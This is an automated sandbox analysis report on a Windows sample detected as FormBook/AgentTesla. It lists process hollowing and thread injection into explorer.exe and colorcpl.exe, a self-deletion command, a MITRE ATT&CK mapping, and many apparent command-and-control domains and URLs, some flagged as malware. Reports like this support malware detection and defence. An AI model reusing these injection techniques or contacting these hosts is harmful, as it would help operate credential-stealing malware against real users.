
Source: C:\Users\user\Desktop\1.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 167.172.69.40 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.167 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.149.87.45 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\1.exe

Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E00000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\1.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

.NET source code references suspicious native API functions

Source: 1.exe, Main.cs	Reference to suspicious API methods: OpenProcess(2035711u, bInheritHandle: false, _targetProcess.Id)
Source: 1.exe, Main.cs	Reference to suspicious API methods: ReadProcessMemory(targetProcessHandle, addr, array, 1, ref lpNumberOfBytesRead)
Source: 1.exe, Main.cs	Reference to suspicious API methods: WriteProcessMemory(_targetProcessHandle, addr, BitConverter.GetBytes(val), 4, 0)

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\1.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\1.exe	Thread register set: target process: 1028			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Thread register set: target process: 1028			Jump to behavior

Source: C:\Users\user\Desktop\1.exe	Process created: C:\Users\user\Desktop\1.exe C:\Users\user\Desktop\1.exe			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\1.exe"			Jump to behavior

Source: explorer.exe, 00000003.00000003.3094165083.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095171280.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453687156.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000003.00000000.2002228438.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4449657195.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000002.4451146462.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2002228438.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4449657195.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.2002228438.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4449657195.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.2002228438.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4449657195.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.2001871398.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4448974063.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\Desktop\1.exe	Queries volume information: C:\Users\user\Desktop\1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	1 Native API	Path Interception	512 Process Injection	1 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	512 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	13 Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	112 System Information Discovery	SSH	Keylogging	Scheduled Transfer	Fallback Channels			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1.exe	93%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
1.exe	82%	Virustotal		Browse
1.exe	100%	Avira	HEUR/AGEN.1307365
1.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.lacroixundkress.com	1%	Virustotal	Browse
lactationdrink.com	1%	Virustotal	Browse
td-ccm-neg-87-45.wixdns.net	0%	Virustotal	Browse
shops.myshopify.com	0%	Virustotal	Browse
www.wisdomtoothguru.com	1%	Virustotal	Browse
www.kvrkl.com	1%	Virustotal	Browse
www.revistabrasileiramarketing.info	0%	Virustotal	Browse
www.topazkibblez.com	0%	Virustotal	Browse
www.successwithyolandafgreen.com	1%	Virustotal	Browse
www.pnorg.net	0%	Virustotal	Browse
www.erotictoybox.com	0%	Virustotal	Browse
www.switchtoambitwithmirtha.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://word.office.comon	0%	URL Reputation	safe
https://word.office.comon	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
http://www.lbarco.com/jskg/www.bootyfashions.com	0%	Avira URL Cloud	safe
http://www.lbarco.com/jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M	0%	Avira URL Cloud	safe
http://www.bootyfashions.comReferer:	0%	Avira URL Cloud	safe
http://www.lactationdrink.com	100%	Avira URL Cloud	malware
http://www.ppc-listing.infoReferer:	0%	Avira URL Cloud	safe
http://www.dog2meeting.com	0%	Avira URL Cloud	safe
http://www.coryfireshop.com	0%	Avira URL Cloud	safe
http://www.lacroixundkress.com/jskg/www.saraadamchak.com	0%	Avira URL Cloud	safe
http://www.successwithyolandafgreen.com/jskg/www.lbarco.com	0%	Avira URL Cloud	safe
http://www.successwithyolandafgreen.comReferer:	0%	Avira URL Cloud	safe
http://www.lacroixundkress.comReferer:	0%	Avira URL Cloud	safe
http://www.lactationdrink.comReferer:	0%	Avira URL Cloud	safe
http://www.successwithyolandafgreen.com/jskg/	0%	Avira URL Cloud	safe
http://www.ppc-listing.info/jskg/www.pnorg.net	100%	Avira URL Cloud	malware
http://www.pnorg.net/jskg/	0%	Avira URL Cloud	safe
http://www.saraadamchak.com	0%	Avira URL Cloud	safe
http://www.successwithyolandafgreen.com	0%	Avira URL Cloud	safe
http://www.switchtoambitwithmirtha.com/jskg/	0%	Avira URL Cloud	safe
http://www.saraadamchak.com/jskg/	0%	Avira URL Cloud	safe
http://www.saraadamchak.com/jskg/www.kvrkl.com	0%	Avira URL Cloud	safe
http://www.erotictoybox.comReferer:	0%	Avira URL Cloud	safe
http://www.switchtoambitwithmirtha.com/jskg/	6%	Virustotal		Browse
http://www.saraadamchak.com/jskg/	1%	Virustotal		Browse
http://www.kvrkl.com/jskg/www.switchtoambitwithmirtha.com	0%	Avira URL Cloud	safe
http://www.saraadamchak.comReferer:	0%	Avira URL Cloud	safe
http://www.successwithyolandafgreen.com	1%	Virustotal		Browse
http://www.pnorg.netReferer:	0%	Avira URL Cloud	safe
http://www.pnorg.net/jskg/	1%	Virustotal		Browse
http://www.coryfireshop.com/jskg/	0%	Avira URL Cloud	safe
http://www.ppc-listing.info/jskg/	100%	Avira URL Cloud	malware
http://www.lactationdrink.com/jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M	100%	Avira URL Cloud	malware
http://www.revistabrasileiramarketing.info/jskg/	0%	Avira URL Cloud	safe
http://www.successwithyolandafgreen.com/jskg/	1%	Virustotal		Browse
http://www.coryfireshop.com/jskg/www.lacroixundkress.com	0%	Avira URL Cloud	safe
http://www.wisdomtoothguru.com/jskg/www.successwithyolandafgreen.com	0%	Avira URL Cloud	safe
http://www.ppc-listing.info	100%	Avira URL Cloud	malware
http://www.wisdomtoothguru.comReferer:	0%	Avira URL Cloud	safe
http://www.kvrkl.com/jskg/	0%	Avira URL Cloud	safe
http://www.kvrkl.com	0%	Avira URL Cloud	safe
http://www.topazkibblez.com	0%	Avira URL Cloud	safe
http://www.coryfireshop.comReferer:	0%	Avira URL Cloud	safe
http://www.erotictoybox.com/jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M	0%	Avira URL Cloud	safe
http://www.dog2meeting.com/jskg/www.erotictoybox.com	0%	Avira URL Cloud	safe
http://www.revistabrasileiramarketing.info/jskg/www.lactationdrink.com	0%	Avira URL Cloud	safe
http://www.wisdomtoothguru.com/jskg/	0%	Avira URL Cloud	safe
http://www.lbarco.comReferer:	0%	Avira URL Cloud	safe
http://www.lbarco.com	0%	Avira URL Cloud	safe
http://www.revistabrasileiramarketing.infoReferer:	0%	Avira URL Cloud	safe
http://www.topazkibblez.comReferer:	0%	Avira URL Cloud	safe
http://www.bootyfashions.com	0%	Avira URL Cloud	safe
http://www.topazkibblez.com/jskg/www.coryfireshop.com	0%	Avira URL Cloud	safe
http://www.pnorg.net	0%	Avira URL Cloud	safe
http://www.pnorg.net/jskg/www.dog2meeting.com	0%	Avira URL Cloud	safe
http://www.lactationdrink.com/jskg/www.wisdomtoothguru.com	100%	Avira URL Cloud	malware
http://www.switchtoambitwithmirtha.com/jskg/www.ppc-listing.info	0%	Avira URL Cloud	safe
http://www.erotictoybox.com/jskg/	0%	Avira URL Cloud	safe
http://www.saraadamchak.com/jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M	0%	Avira URL Cloud	safe
http://www.topazkibblez.com/jskg/	0%	Avira URL Cloud	safe
http://www.erotictoybox.com	0%	Avira URL Cloud	safe
http://www.dog2meeting.comReferer:	0%	Avira URL Cloud	safe
http://www.switchtoambitwithmirtha.comReferer:	0%	Avira URL Cloud	safe
www.switchtoambitwithmirtha.com/jskg/	0%	Avira URL Cloud	safe
http://www.kvrkl.comReferer:	0%	Avira URL Cloud	safe
http://www.dog2meeting.com/jskg/	0%	Avira URL Cloud	safe
http://www.lacroixundkress.com/jskg/	0%	Avira URL Cloud	safe
http://www.bootyfashions.com/jskg/	0%	Avira URL Cloud	safe
http://www.lactationdrink.com/jskg/	100%	Avira URL Cloud	malware
http://www.switchtoambitwithmirtha.com	0%	Avira URL Cloud	safe
http://www.bootyfashions.com/jskg/www.topazkibblez.com	0%	Avira URL Cloud	safe
http://www.lbarco.com/jskg/	0%	Avira URL Cloud	safe
http://www.lacroixundkress.com	0%	Avira URL Cloud	safe
http://www.revistabrasileiramarketing.info	0%	Avira URL Cloud	safe
http://www.wisdomtoothguru.com	0%	Avira URL Cloud	safe
http://www.lbarco.com/jskg/	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.lacroixundkress.com	217.160.0.167	true	true	1%, Virustotal, Browse	unknown
lactationdrink.com	167.172.69.40	true	true	1%, Virustotal, Browse	unknown
td-ccm-neg-87-45.wixdns.net	34.149.87.45	true	true	0%, Virustotal, Browse	unknown
shops.myshopify.com	23.227.38.74	true	true	0%, Virustotal, Browse	unknown
www.revistabrasileiramarketing.info	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.bootyfashions.com	unknown	unknown	true		unknown
www.dog2meeting.com	unknown	unknown	true		unknown
www.kvrkl.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.wisdomtoothguru.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.successwithyolandafgreen.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.topazkibblez.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.lactationdrink.com	unknown	unknown	true		unknown
www.lbarco.com	unknown	unknown	true		unknown
www.switchtoambitwithmirtha.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.coryfireshop.com	unknown	unknown	true		unknown
www.pnorg.net	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.saraadamchak.com	unknown	unknown	true		unknown
www.erotictoybox.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.lbarco.com/jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M	true	Avira URL Cloud: safe	unknown
http://www.lactationdrink.com/jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M	true	Avira URL Cloud: malware	unknown
http://www.erotictoybox.com/jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M	true	Avira URL Cloud: safe	unknown
http://www.saraadamchak.com/jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M	true	Avira URL Cloud: safe	unknown
www.switchtoambitwithmirtha.com/jskg/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000003.00000002.4453052192.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.bootyfashions.comReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lactationdrink.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.lbarco.com/jskg/www.bootyfashions.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ppc-listing.infoReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dog2meeting.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.coryfireshop.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lacroixundkress.com/jskg/www.saraadamchak.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.successwithyolandafgreen.com/jskg/www.lbarco.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 00000003.00000002.4455231166.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2007842523.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.successwithyolandafgreen.comReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lacroixundkress.comReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lactationdrink.comReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.successwithyolandafgreen.com/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000003.00000003.3094165083.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095171280.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453687156.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 00000003.00000002.4452618925.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4452142235.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2004670806.0000000008890000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ppc-listing.info/jskg/www.pnorg.net	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.pnorg.net/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.saraadamchak.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.successwithyolandafgreen.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.switchtoambitwithmirtha.com/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.saraadamchak.com/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.saraadamchak.com/jskg/www.kvrkl.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.erotictoybox.comReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kvrkl.com/jskg/www.switchtoambitwithmirtha.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.saraadamchak.comReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pnorg.netReferer:	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.coryfireshop.com/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ppc-listing.info/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.revistabrasileiramarketing.info/jskg/	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.coryfireshop.com/jskg/www.lacroixundkress.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000003.00000003.3779584594.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2007842523.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094563543.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4455465026.000000000C54A000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ppc-listing.info	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.wisdomtoothguru.com/jskg/www.successwithyolandafgreen.com	explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
